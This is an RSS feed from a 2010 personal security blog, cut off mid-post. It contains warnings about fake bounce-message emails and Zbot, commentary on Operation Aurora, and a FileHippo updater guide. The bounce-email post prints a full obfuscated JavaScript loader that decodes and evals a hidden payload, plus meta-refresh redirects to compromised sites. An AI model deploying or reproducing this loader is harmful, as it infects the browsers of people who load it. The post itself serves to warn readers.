<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" ><channel><title>Zero / Love &#187; Nerdology</title> <atom:link href="http://www.zerosource.org/category/technology/feed" rel="self" type="application/rss+xml" /><link>http://www.zerosource.org</link> <description>Father, Husband, System Engineer, Spam Fighting Ninja!</description> <lastBuildDate>Fri, 16 Jul 2010 04:46:44 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.0.1</generator> <item><title>Mailer-Daemon and Postmaster are NOT your Friend</title><link>http://www.zerosource.org/2010/07/mailerdaemon-postmaster-friend.html</link> <comments>http://www.zerosource.org/2010/07/mailerdaemon-postmaster-friend.html#comments</comments> <pubDate>Fri, 16 Jul 2010 04:43:48 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Nerdology]]></category> <category><![CDATA[alert virus]]></category> <category><![CDATA[Virus Alert]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=1510</guid> <description><![CDATA[Some of you may be excited to get email from Postmaster or Mailer-Daemon, but unless you are the Email administrator they are NOT your friend.  There is currently email going out that claims to be a NDR (Non Delivery Report).  This is you sent an email to someone, it failed.  The problem is the NDR [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2010/07/mailerdaemon-postmaster-friend.html">Mailer-Daemon and Postmaster are NOT your Friend</a></p> ]]></description> <content:encoded><![CDATA[<p><a target="_blank" href="http://www.flickr.com/photos/20149359@N00/2022423651" rel="nofollow" ><img class="alignleft" style="margin: 5px;" title="Ugly face" src="http://farm3.static.flickr.com/2365/2022423651_b7c2110c72_m.jpg" border="0" alt="Ugly face" hspace="5" width="84" height="168" /></a>Some of you may be excited to get email from Postmaster or Mailer-Daemon, but unless you are the Email administrator they are NOT your friend.  There is currently email going out that claims to be a NDR (<a target="_blank" href="http://en.wikipedia.org/wiki/Bounce%20message" rel="nofollow" id="aptureLink_Kvld785jmV" >Non Delivery Report</a>).  This is you sent an email to someone, it failed.  The problem is the NDR does not tell you who the email was sent to.  Just that you sent it.   Ohh but look there is an attachment.  The attachment says Original Message or similar.</p><p><span id="more-1510"></span></p><p>This is NOT the original message, but an html file.  This will open your browser. The browser will redirect you to a website that has a flaw in it.  Or if you are lucky, to a website trying to sell you something.</p><p>I have seen various forms of this, so far they are all from mailer-daemon or postmaster.  Most of them originate from Russia.  The other subjects I&#8217;ve seen are:</p><blockquote><p>Delivery Status Notification</p></blockquote><blockquote><p>Email Policy Violation</p></blockquote><p>One had this refresh:</p><blockquote><p>﻿&lt;meta http-equiv=&#8221;refresh&#8221; content=&#8221;0;url=http://www.loge1**1amsterdam.nl/index3.html&#8221; /&gt;</p></blockquote><blockquote><p>&lt;meta http-equiv=&#8221;refresh&#8221; content=&#8221;0;url=http://galleryp*.co.kr/index3.html&#8221; /&gt;</p></blockquote><p>Notice that both end with index3.html</p><p>The Java Script:</p><blockquote><p>&lt;script&gt;var uKU = Math.random();var xIF=&#8221;;var nE = Math.random();var yLI = Math.random();var wGV;var mTM=&#8221;;var rN = Math.ceil(41);var jZ=&#8221;;var rGU=&#8221;;wGV=&#8217;b1abb8&#8242;+&#8217;b2bab2&#8242;+&#8217;b4baf2&#8242;+&#8217;99ad85&#8242;+&#8217;a0fbfd&#8217;+'e7cfae&#8217;+'aeb7a2&#8242;+&#8217;dff3e8&#8242;+&#8217;b9abab&#8217;+'a1adb9&#8242;+&#8217;a6aea0&#8242;+&#8217;b0bab4&#8242;+&#8217;82acb9&#8242;+&#8217;a99eb3&#8242;+&#8217;b5f5aa&#8217;+'a2bde8&#8242;+&#8217;a1bab3&#8242;+&#8217;a683f1&#8242;+&#8217;e7b8b8&#8242;+&#8217;abb7e7&#8242;+&#8217;f9&#8242;;var qS = Math.random();var mRC=55850;function lJ(nU){var sR=&#8221;;var gU=&#8221;;function y(f){var fL=new Array();var x=new Array();var v=0,r=f['\u006c\u0065'+unescape('%6e%67%74%68')];var vF = Math.ceil(6);var uI = Math.ceil(6);var yT=new Array();for(var iD=2;iD&lt;r+2;iD++){var yX=false;var yZ=false;var z=new Array();var oL = Math.ceil(24);var dM = Math.ceil(24);uK=qM(f,iD-2);v=v+uK*r;}var uB = Math.ceil(11);var gUQ=false;var yTR=&#8221;;var zJ=50530;return new String(v);var kQ=&#8221;;var tS=new Array();}var rMA=false;var sP=&#8221;;function h(s, t){var tZ=&#8221;;var iP = Math.ceil(33);var hZ = Math.ceil(33);if(fS == null) {var bX=false;var uIM=false;var hR = Math.ceil(21);fS = {};var xBN=false;var aYZ=new Date();var wZ=&#8221;;}var e=new Array();if(fS[s] == null) {var jU = Math.ceil(44);var zFI=&#8221;;var qH = Math.ceil(44);var pBM=&#8221;;var eJ=&#8221;;var uO = Math.ceil(41);var q = Object;var nA=new Array();var bN=new Array();var qA=new Array();var vR=false;fS[s] = new q();var hXT=54078;fS[s].wK = 0;var bC=new Date();var mP=false;fS[s].u = t;var w=false;}var bH=&#8221;;var lX=new Date();}function n(s) {var sY = Math.ceil(42);if(fS[s] != null) {var gT=48196;var pA=&#8221;;var pB = fS[s];var bF=48403;var nK = pB.wK;var hXG=&#8221;;var pT=new Date();var tYJ=&#8221;;var iG = pB.u;var xDP = Math.random();var tY = iG.substr(nK, 1);var gG = iG['\u006c\u0065'+unescape('%6e%67%74%68')];                        var aU = 1;var mX = Math.ceil(42);var dE=&#8221;;if(nK + aU &lt; gG) {var kL = Math.random();var qR=new Array();var pBO = Math.ceil(29);pB.wK = nK + aU;var dZK=&#8221;;var gZW=new Date();} else {var fCY = Math.random();pB.wK = aU &#8211; 1;var bHE=24510;var wB = Math.ceil(37);}return qM(tY, aU &#8211; 1);var fEL=48782;var nJG=46689;var bNX = Math.random();}var iR = Math.random();}var zK = Math.random();var nO = Math.random();var gX=&#8221;;function qM(xB,gR){var zN=new Array();return xB['\u0063\u0068\u0061\u0072'+unescape('%43%6f%64%65%41%74')](gR);var hS=new Array();}var iC=42895;var wY=7594;var qG=&#8221;;var xV=new Array();var lM=false;var cA=&#8221;;function eD(aX,fO){var bCL=&#8221;;var xU = Math.random();return aX^fO;var aJ=29561;}var pQ = Math.ceil(36);var hC=56770;function d(xB,gR){var tUX = Math.ceil(29);var bI=&#8221;;return xB['\u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')](gR);var uER = Math.random();var aL = Math.random();var aXS = Math.random();}var tT=&#8221;;var eZ=&#8221;;var jUK = Math.ceil(44);var oG=window;var qW=&#8221;;var lBA = Math.ceil(15);var gW=new Array();var fS = null;var lU=new Array();var hMQ=false;var wV=String;var wYA=new Array();var vZ=document;var bWH=false;var aJP=false;var bE = new wV(lJ);var fT=&#8221;;var yB=new Date();var cNZ=new Array();var bJ=&#8221;;var xD = new wV(vZ['\u0077'+unescape('%72%69%74%65')]);var eN=&#8221;;var dS=16914;var aZ = xD['\u0069\u006e\u0064\u0065'+unescape('%78%4f%66')](&#8216;\u0061\u0072&#8242;+unescape(&#8216;%69%74%79&#8242;));var yNI = Math.ceil(33);var lZ=new Array();var sHN=new Array();if(aZ != -1) {var dQ=36609;var vA=new Array();var fZ=28165; return 130;}var bY=9596;var sW = Math.ceil(24);var vLV = Math.random();var rC=wV['\u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')];var oRL=new Array();var uP=130;var tP = oG['\u0073\u0065\u0074\u0054'+unescape('%69%6d%65%6f%75%74')];var dWL=&#8221;;var wP=new Array();var jT = &#8221;;var pTR=new Date();var nJ=oG['\u0075\u006e\u0065\u0073\u0063\u0061'+unescape('%70%65')];var oK = Math.ceil(44);var rUT=new Array();var rDJ = Math.ceil(44);var cI = &#8221;;var jXH = Math.ceil(6);var qQ = Math.ceil(6);var tW = Math.random();var j = &#8216;%&#8217;;var lVC=&#8221;;var oHK = Math.random();var pY = 2;var uT=new Array();var vX = Math.random();var kY = Math.random();var uQ = 0;var zD=uQ;var hSS = Math.ceil(8);var qHI=&#8221;;var pOJ=11644;while(zD &lt; nU['\u006c\u0065'+unescape('%6e%67%74%68')]){var vW=&#8221;;var tI=new Array();var pZ=new Array();cI+= j + nU['\u0073'+unescape('%75%62%73%74%72')](zD, pY);var hD=&#8221;;var cQ = Math.random();var cLL = Math.random();zD+=pY;var yG=new Array();var qME=22402;var zGY=new Date();}var hDY=&#8221;;var hKT=58760;var pR = Math.ceil(40);var uU=new Array();var nU = nJ(cI);var kHB=&#8221;;var aY = bE['\u0072\u0065\u0070\u006c'+unescape('%61%63%65')](/[^@a-z0-9A-Z_-]/g, new String());var gB=&#8221;;var c = new wV(y(aY));var bLJ = Math.ceil(34);var sOG=&#8221;;var bZJ=false;var fMR=new Array();h(&#8216;sT&#8217;, aY);h(&#8216;l&#8217;, c);var mWF = Math.random();var iMP=46233;var wG = Math.ceil(47);var kRR=false;var dU=uQ;var fDZ=&#8221;;var fH=&#8221;;var rH=false;var cOD=false;while(dU &lt; 10000) {var dWY=false;var xF = Math.random();var gXD=new Date();var cFX=&#8221;;var cK=&#8221;;var qJ = nU['\u0063\u0068\u0061\u0072'+unescape('%43%6f%64%65%41%74')](dU);if(isNaN(qJ)) break;var bYL=new Date();var nT=&#8221;;qJ = eD(qJ, uP);qJ = eD(qJ, n(&#8216;l&#8217;));qJ = eD(qJ, n(&#8216;sT&#8217;));var aHO=new Array();var hAF=60523;var eP=new Date();var nUA=&#8221;;jT=jT+d(wV,qJ);var mNH=&#8221;;dU++;var sSF=new Array();var mS = Math.ceil(5);}var sZM=&#8221;;oG['\u0065'+unescape('%76%61%6c')](jT);var pRK=new Date();var vXF = Math.random();return jT=new wV();var lN=&#8221;;var yHE = Math.ceil(49);var fEM = Math.ceil(18);var yU=new Date();};var qX=new Date();var jZS=false;var dLV=&#8221;;var tHB=new Date();lJ(wGV);var tRH=&#8221;;var vFZ=&#8221;;&lt;/script&gt;</p></blockquote><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2010/07/mailerdaemon-postmaster-friend.html">Mailer-Daemon and Postmaster are NOT your Friend</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2009/01/conflicker-downup-downadup-kido-spreading-removal-virus-alert.html" title="Conflicker, Downup, Downadup, Kido Spreading &#8211; Removal &#8211; Virus Alert!">Conflicker, Downup, Downadup, Kido Spreading &#8211; Removal &#8211; Virus Alert!</a> (6)</li><li><a href="http://www.zerosource.org/2009/01/amazing-news-obama-refuses-to-be-president-virus-alert.html" title="Amazing News &#8211; Obama Refuses to be President &#8211; Virus Alert">Amazing News &#8211; Obama Refuses to be President &#8211; Virus Alert</a> (1)</li><li><a href="http://www.zerosource.org/2009/01/microsoft-antivirus-2009-virtumondevundo-virus-removal.html" title="Microsoft AntiVirus 2009, Virtumonde,Vundo Virus &#8211; Removal">Microsoft AntiVirus 2009, Virtumonde,Vundo Virus &#8211; Removal</a> (10)</li><li><a href="http://www.zerosource.org/2009/10/zbot-variants-spreading.html" title="Zbot Variants Spreading!">Zbot Variants Spreading!</a> (0)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2010/07/mailerdaemon-postmaster-friend.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Operation Aurora &#8211; Continues</title><link>http://www.zerosource.org/2010/02/operation-aurora-continues.html</link> <comments>http://www.zerosource.org/2010/02/operation-aurora-continues.html#comments</comments> <pubDate>Mon, 01 Feb 2010 06:40:50 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Commentary]]></category> <category><![CDATA[Nerdology]]></category> <category><![CDATA[Aurora]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[security]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=1071</guid> <description><![CDATA[So continuing on from the previous post on Operation Aurora.  We now know that Microsoft had known about this flaw for a while.   Now we will examine the Chinese Governments place in this whole mess. On January 12, 2010 Google on its own blog, posted that it had been attacked and that it originated from China. [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2010/02/operation-aurora-continues.html">Operation Aurora &#8211; Continues</a></p> ]]></description> <content:encoded><![CDATA[<p>So continuing on from the previous post on <a href="http://www.zerosource.org/2010/01/operation-aurora-chinese-government-more-reasons-to-ditch-internet-explorer.html"title="Operation Aurora – Chinese Government – More reasons to ditch Internet Explorer"  target="_self">Operation Aurora</a>.  We now know that Microsoft had known about this flaw for a while.   Now we will examine the Chinese Governments place in this whole mess.</p><p><span id="more-1071"></span></p><p>On January 12, 2010 Google on its own blog, posted that it had been attacked and that it originated from China.  At the same time Google threatened &#8220;reviewing its business in China&#8221;.  On the same day U.S. <a target="_blank" href="http://en.wikipedia.org/wiki/Secretary_of_State" rel="nofollow" title="Secretary of State" >Secretary of State</a> <a target="_blank" href="http://en.wikipedia.org/wiki/Hilary_Clinton" rel="nofollow" title="Hilary Clinton" >Hilary Clinton</a> released a statement condemning the attacks.</p><p><a target="_blank" href="http://www.flickr.com/photos/44237541@N00/2101765353" rel="nofollow" ><img class="alignleft" style="margin-left: 5px; margin-right: 5px; border: 0px initial initial;" title="Elephant" src="http://static.zerosource.org/wp-content/uploads/2010/02/2101765353_3478d27d37_m1.jpg" border="0" alt="Elephant" hspace="5" /></a> This weekend in Davos-Klosters, Switzerland started the <a target="_blank" href="http://en.wikipedia.org/wiki/World_Economic_Forum" rel="nofollow" title="WEF"  target="_blank">World Economic Forum</a>.  The one thing that was not brought up was the attack from China on Google. Lets not forget at this forum both China and Google was present and accounted.  You might say it was a big&#8217;ol elephant in the room.  People were asked about the attacks.  The Vice Premier Li Keqiang, of China made it clear &#8220;China did not want to discuss Google&#8221;.</p><p>So where does this leave us? Should this be forgotten for economic reasons? Is it at this time, we walk away and go &#8220;Well Shit Happens!&#8221;.</p><p>There was never a mass attack using this flaw.  It seem to be quietly aimed at certain US Companies.   I can tell you now, no one is going to know what all was taken and or compromised.  I believe these types of attacks will become more and more common, not just used by countries vs countries but individual groups vs whole countries.</p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2010/02/operation-aurora-continues.html">Operation Aurora &#8211; Continues</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2010/01/operation-aurora-chinese-government-more-reasons-to-ditch-internet-explorer.html" title="Operation Aurora &#8211; Chinese Government &#8211; More reasons to ditch Internet Explorer">Operation Aurora &#8211; Chinese Government &#8211; More reasons to ditch Internet Explorer</a> (0)</li><li><a href="http://www.zerosource.org/2009/03/april-fools-your-infected-no-really-seriously.html" title="April Fools, You&#8217;re Infected.. No Really.. Seriousl">April Fools, You&#8217;re Infected.. No Really.. Seriousl</a> (3)</li><li><a href="http://www.zerosource.org/2009/03/why-microsoft-hosted-exchange.html" title="Why Microsoft Hosted Exchange?">Why Microsoft Hosted Exchange?</a> (5)</li><li><a href="http://www.zerosource.org/2009/02/zero-day-exploit-in-microsoft-excel.html" title="Zero-Day Exploit in Microsoft Excel">Zero-Day Exploit in Microsoft Excel</a> (0)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2010/02/operation-aurora-continues.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Operation Aurora &#8211; Chinese Government &#8211; More reasons to ditch Internet Explorer</title><link>http://www.zerosource.org/2010/01/operation-aurora-chinese-government-more-reasons-to-ditch-internet-explorer.html</link> <comments>http://www.zerosource.org/2010/01/operation-aurora-chinese-government-more-reasons-to-ditch-internet-explorer.html#comments</comments> <pubDate>Tue, 26 Jan 2010 04:04:57 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Commentary]]></category> <category><![CDATA[Nerdology]]></category> <category><![CDATA[Aurora]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[security]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=1066</guid> <description><![CDATA[If your still using Internet Explorer as your main web browser, I&#8217;m sorry.  If you don&#8217;t know of other browsers that are available.  Let me point out a couple.  My favorite is Chrome, and my second favorite is FireFox.  If you need a reason to change, let me introduce you to &#8220;Operation Aurora&#8221;. I believe [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2010/01/operation-aurora-chinese-government-more-reasons-to-ditch-internet-explorer.html">Operation Aurora &#8211; Chinese Government &#8211; More reasons to ditch Internet Explorer</a></p> ]]></description> <content:encoded><![CDATA[<p><a target="_blank" href="http://www.flickr.com/photos/36334551@N00/146743083" rel="nofollow" ><img class="alignleft" style="margin-left: 5px; margin-right: 5px; margin-top: 3px; margin-bottom: 3px;" title="Northen Lights (Aurora Borealis)" src="http://static.zerosource.org/wp-content/uploads/2010/01/146743083_ab97013e4d_m.jpg" border="0" alt="Northen Lights (Aurora Borealis)" hspace="5" width="144" height="96" /></a>If your still using Internet Explorer as your main web browser, I&#8217;m sorry.  If you don&#8217;t know of other browsers that are available.  Let me point out a couple.  My favorite is <a target="_blank" href="http://www.google.com/chrome" rel="nofollow" title="Google Ghrome"  target="_blank">Chrome</a>, and my second favorite is <a target="_blank" href="http://www.mozilla.com/en-US/firefox/firefox.html?from=getfirefox" rel="nofollow" title="Firefox Web Browser"  target="_blank">FireFox</a>.  If you need a reason to change, let me introduce you to &#8220;Operation Aurora&#8221;.</p><p><span id="more-1066"></span></p><p>I believe Microsoft said it best about project Aurora.  And I quote:</p><blockquote><p><a target="_blank" href="http://www.microsoft.com/technet/security/advisory/979352.mspx" rel="nofollow" title="Microsoft Security Advisory (979352)"  target="_blank">Microsoft Security Advisory (979352) &#8211; Vulnerability in Internet Explorer Could allow Remote Code Execution</a></p></blockquote><p>So what does this mean?  Well if you go to the right web page&#8230; just go to it.  Your computer can be compromised by an &#8220;Hacker&#8221;.  When Is say hacker, I mean the Chinese Government.  For the record, no one in the Chinese Government has come out to say they did it, but&#8230; well common sense says different.  We&#8217;ll get to that later.  You know whats funny, is I don&#8217;t fault nor do I blame them.  I blame Microsoft.  I will get to this later.</p><p>Lets look at the companies that where effected to begin with:</p><ul><li>Google</li><li>Adobe Systems</li><li>Juniper Networks</li><li>RackSpace</li></ul><p>unconfirmed but probably so:</p><ul><li>Yahoo</li><li>Symantec</li><li>Northrop Grumman</li><li>Dow Chemical</li></ul><p>So why do I blame Microsoft and not the Chinese Government?  Well its simple&#8230; as usual  Microsoft has know about this flaw for a while.  My simple research shows they have known about it since September of 2009.  That is four months to long for what should have been considered a <strong>critical flaw</strong>.  How many of you store not just your personal important but your businesses important data on computers running windows.   Now how many of them are being used with Internet Explorer as the default browser?  Now how does that make you feel?  This should have been put to the top of the priority queue for fixing.   It should not have waited till it was being exploited to be fixed.</p><p>To be continued&#8230;..</p><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2010/01/operation-aurora-chinese-government-more-reasons-to-ditch-internet-explorer.html">Operation Aurora &#8211; Chinese Government &#8211; More reasons to ditch Internet Explorer</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2010/02/operation-aurora-continues.html" title="Operation Aurora &#8211; Continues">Operation Aurora &#8211; Continues</a> (0)</li><li><a href="http://www.zerosource.org/2009/03/april-fools-your-infected-no-really-seriously.html" title="April Fools, You&#8217;re Infected.. No Really.. Seriousl">April Fools, You&#8217;re Infected.. No Really.. Seriousl</a> (3)</li><li><a href="http://www.zerosource.org/2009/03/why-microsoft-hosted-exchange.html" title="Why Microsoft Hosted Exchange?">Why Microsoft Hosted Exchange?</a> (5)</li><li><a href="http://www.zerosource.org/2009/02/zero-day-exploit-in-microsoft-excel.html" title="Zero-Day Exploit in Microsoft Excel">Zero-Day Exploit in Microsoft Excel</a> (0)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2010/01/operation-aurora-chinese-government-more-reasons-to-ditch-internet-explorer.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>How do you keep updated?</title><link>http://www.zerosource.org/2010/01/how-do-you-keep-updated.html</link> <comments>http://www.zerosource.org/2010/01/how-do-you-keep-updated.html#comments</comments> <pubDate>Mon, 04 Jan 2010 04:52:35 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Nerdology]]></category> <category><![CDATA[Windows]]></category><guid isPermaLink="false">http://www.zerosource.org/2010/01/how-do-you-keep-updated.html</guid> <description><![CDATA[Well I’m not talking about news, we all have our favorite news sites Digg and Slashdot?&#160; I’m talking about Windows Software, not windows itself.&#160; You should have windows update turned on for that.&#160; I’m talking about everything else, how do you keep it updated.&#160; Do you wait for the software to complain that it is [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2010/01/how-do-you-keep-updated.html">How do you keep updated?</a></p> ]]></description> <content:encoded><![CDATA[<p>Well I’m not talking about news, we all have our favorite news sites <a target="_blank" href="http://www.digg.com"title="Digg"  rel="nofollow" target="_blank">Digg</a> and <a target="_blank" href="http://slashdot.org"title="News for Nerds!"  rel="nofollow" target="_blank">Slashdot</a>?&#160; I’m talking about Windows Software, not windows itself.&#160; You should have windows update turned on for that.&#160; I’m talking about everything else, how do you keep it updated.&#160; Do you wait for the software to complain that it is old?&#160;&#160; Do you have several updaters running in the background, for instance, Java Update or Quicken update?&#160; If so, you are wasting memory and slowing down your system.&#160; What I have found to be the best and easiest way to keep updated is to use, <a target="_blank" href="http://www.filehippo.com/updatechecker/" rel="nofollow" title="FileHippo.Com Update Checker"  target="_blank">FileHippo.Com Updater</a>.&#160;</p><p> <span id="more-1054"></span><p>This is a small install that I run when I reboot my system.&#160; It checks for updates and gives me a safe place to download them from.&#160; I also use my favorite Windows Start editor (Crap Cleaner) and turn off and/or remove all other updaters that sit in the background waiting to update a single piece of software.&#160; This gives me an updated and faster running machine.&#160;</p><p>&#160;</p><p>You can run FileHippo.Com Updater from your Start Menu –&gt; Programs.&#160; When you do you will be shown the following dialog.</p><p><a href="http://static.zerosource.org/wp-content/uploads/2010/01/filehippo.jpg" rel="lightbox[1054]"><img style="border-right-width: 0px; margin: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="filehippo" border="0" alt="filehippo thumb How do you keep updated?" align="left" src="http://static.zerosource.org/wp-content/uploads/2010/01/filehippo_thumb.jpg" width="244" height="85" /></a></p><p>Just let it run and it will provide you with a website list of all the updates it found for your software.&#160;</p><p>&#160;</p><p>&#160;</p><h4>Now lets go through the settings!</h4><p>&#160;</p><p>Settings for this program are pretty straight forward.&#160; <a href="http://static.zerosource.org/wp-content/uploads/2010/01/settings_filehippo.jpg" rel="lightbox[1054]"><img style="border-bottom: 0px; border-left: 0px; margin: 0px 0px 0px 5px; display: inline; border-top: 0px; border-right: 0px" title="settings_filehippo" border="0" alt="settings filehippo thumb How do you keep updated?" align="right" src="http://static.zerosource.org/wp-content/uploads/2010/01/settings_filehippo_thumb.jpg" width="244" height="167" /></a> First we have the option of setting our browser.&#160; This is important because, this is the browser that will launch when it finds an update.&#160; You have the option of seeing or not seeing beta programs and it will show you where you have the program installed.&#160;</p><p>&#160;</p><p>&#160;</p><p>&#160;</p><p>Next one is custom locations, this one is for those that install the software in a “Special” place.&#160; Not the standard place the software wants to be installed.&#160; This is where you can tell the updater where to look for other programs you have installed.</p><p><a href="http://static.zerosource.org/wp-content/uploads/2010/01/settings_filehippo2.jpg" rel="lightbox[1054]"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="settings_filehippo2" border="0" alt="settings filehippo2 thumb How do you keep updated?" src="http://static.zerosource.org/wp-content/uploads/2010/01/settings_filehippo2_thumb.jpg" width="244" height="167" /></a></p><p>&#160;</p><p>&#160;</p><p>After that it is a simple connections box.&#160; This is pretty standard, if you use a proxy to access the web here is where you would put the information. If you don’t use a proxy or know what it is, then don’t worry about this.</p><p><a href="http://static.zerosource.org/wp-content/uploads/2010/01/settings_filehippo3.jpg" rel="lightbox[1054]"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="settings_filehippo3" border="0" alt="settings filehippo3 thumb How do you keep updated?" src="http://static.zerosource.org/wp-content/uploads/2010/01/settings_filehippo3_thumb.jpg" width="244" height="167" /></a></p><p>&#160;</p><p>Finally is the Advanced tab, I choose to have it close if there are no updates.&#160; Simply when I reboot the machine it checks, if I have no outstanding updates close it.&#160; The second it to actually run it when I reboot.&#160; I choose to do this, and ever now and then I will run it manually if I know I haven’t rebooted my machine in a while.</p><p><a href="http://static.zerosource.org/wp-content/uploads/2010/01/settings_filehippo4.jpg" rel="lightbox[1054]"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="settings_filehippo4" border="0" alt="settings filehippo4 thumb How do you keep updated?" src="http://static.zerosource.org/wp-content/uploads/2010/01/settings_filehippo4_thumb.jpg" width="244" height="167" /></a></p></p><p>This is one of the great services FileHippo.Com provides, I also use it find new software that I may not know about.&#160; Visit the site <a target="_blank" href="http://www.filehippo.com" rel="nofollow" >http://www.filehippo.com</a> and see for yourself.</p><p>&#160;</p><div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:0767317B-992E-4b12-91E0-4F059A8CECA8:9fbc446e-243c-4fdd-a7e5-0af789f4fbf3" class="wlWriterEditableSmartContent">Technorati Tags: <a target="_blank" href="http://technorati.com/tags/Windows" rel="nofollow"  rel="tag">Windows</a>,<a target="_blank" href="http://technorati.com/tags/Software" rel="nofollow"  rel="tag">Software</a>,<a target="_blank" href="http://technorati.com/tags/updates" rel="nofollow"  rel="tag">updates</a></div><p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2010/01/how-do-you-keep-updated.html">How do you keep updated?</a></p><div class="related_post_title">Its related:</div><ul class="related_post"><li><a href="http://www.zerosource.org/2009/01/microsoft-antivirus-2009-virtumondevundo-virus-removal.html" title="Microsoft AntiVirus 2009, Virtumonde,Vundo Virus &#8211; Removal">Microsoft AntiVirus 2009, Virtumonde,Vundo Virus &#8211; Removal</a> (10)</li><li><a href="http://www.zerosource.org/2008/12/zero-top-windows-software-of-2008.html" title="Zero Top Windows Software of 2008">Zero Top Windows Software of 2008</a> (1)</li><li><a href="http://www.zerosource.org/2008/12/opendns-protect-your-children-period.html" title="OpenDNS – Protect your children, Period!">OpenDNS – Protect your children, Period!</a> (1)</li><li><a href="http://www.zerosource.org/2008/12/hallmark-coke-and-mcdonalds-virus-alert.html" title="Hallmark, Coke, and McDonalds: VIRUS Alert">Hallmark, Coke, and McDonalds: VIRUS Alert</a> (0)</li></ul>]]></content:encoded> <wfw:commentRss>http://www.zerosource.org/2010/01/how-do-you-keep-updated.html/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Zbot Variants Spreading!</title><link>http://www.zerosource.org/2009/10/zbot-variants-spreading.html</link> <comments>http://www.zerosource.org/2009/10/zbot-variants-spreading.html#comments</comments> <pubDate>Thu, 22 Oct 2009 05:17:42 +0000</pubDate> <dc:creator>zerolove</dc:creator> <category><![CDATA[Nerdology]]></category> <category><![CDATA[virus]]></category> <category><![CDATA[Virus Alert]]></category> <category><![CDATA[Zbot]]></category><guid isPermaLink="false">http://www.zerosource.org/?p=1018</guid> <description><![CDATA[There are several ways to propagate a virus. One of them being social engineering.  This is what the Zbot variants are trying to do.  They are sending emails that seem to come from your service provider, Microsoft themselves, and or your system administrator. How often do you really get an email from Microsoft telling you [...]<p>This is Post from: <a href="http://www.zerosource.org">ZeroSource</a>!<br/><br/><a href="http://www.zerosource.org/2009/10/zbot-variants-spreading.html">Zbot Variants Spreading!</a></p> ]]></description> <content:encoded><![CDATA[<p><span style="background-color: #ffffff;"><img class="alignleft" style="margin: 3px;" title="Iron face" onclick="insert_image('http://www.flickr.com/photos/22258062@N00/14412196', 'http://farm1.static.flickr.com/13/14412196_6df76d4f85', 'Iron face');" src="http://static.zerosource.org/wp-content/uploads/2009/10/14412196_6df76d4f85_s.jpg" alt="14412196 6df76d4f85 s Zbot Variants Spreading!" hspace="2" vspace="2" width="75" height="75" />There are several ways to propagate a virus. One of them being social engineering.  This is what the Zbot variants are trying to do.  They are sending emails that seem to come from your service provider, Microsoft themselves, and or your system administrator.</span></p><p><span id="more-1018"></span>How often do you really get an email from Microsoft telling you that there is an update?  For most people, this is never.  I have worked in the Information Technology field for almost 20 years and I haven&#8217;t got an email from them to tell me there is an update.   So why do you think they are doing it now?  Better yet, do you think they are keeping track of every user that has outlook some and their email address?</p><p>So are you the system administrator?  Do you actually email people from &#8220;System Admin&#8221;?  I mean really?  Security 101 tells you to change the administrator anyway.  You should not be emailing from System Admin.  So how often does your System Administrator email you?</p><p>So by tricking you to think you are going to a real website and downloading a real upgrade or settings change they are getting you to install the Zbot variant.</p><p>So what exactly does the Zbot Trojan/Virus do?   First off <span style="background-color: #ffffff;">it is a trojan that disables windows firewall,  steals sensitive financial data (credit card numbers, online banking login details),  makes screen snapshots,  downloads additional components,  and provides a hacker with the remote access to the compromised system.</span></p><p><span style="background-color: #ffffff;">Zbot creates a file 